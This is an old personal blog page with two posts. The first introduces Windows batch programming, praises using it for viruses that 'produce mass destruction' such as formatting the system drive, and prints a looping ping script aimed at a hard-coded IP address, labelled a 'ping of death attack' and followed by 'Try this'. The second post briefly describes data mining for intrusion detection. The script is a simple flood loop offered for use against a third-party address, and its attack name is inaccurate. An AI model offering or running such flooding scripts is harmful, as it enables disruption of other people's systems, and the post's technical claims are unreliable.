Sunday, January 25, 2009

Batch-Programming

Hai readers of my blog

Batch programming similar to shell programming in unix.I learnt batch programming from ankit fadia article awesome article.Simple in meaning.

Batch programming can be used to create attacks n simple viruses which can produce mass destruction.like formatting the drive in which xp is installed.

The only drawback is files created are stored in .bat format where the file cant be send thru e-mail.If its an exe file then it can be easily transported.

Batch programming can create havoc...........

simple ping of death attack

@echo off
cd\
cd windows
cd system32
:prasad
ping -n 4889652 125.45.125.14
goto prasad


Try this................

Data Mining-Intrusion Detection

Hai readers of my blog....

Data mining one of the technologies which is changin the prespectives of software developers....
In simple Mining old datas an trying to find some patterns or rules and creating patterns to improve the business progress....

Recent research is on mining network datas and trying to create a profile..."Frequent Episode Rule" is the algorithm widely used.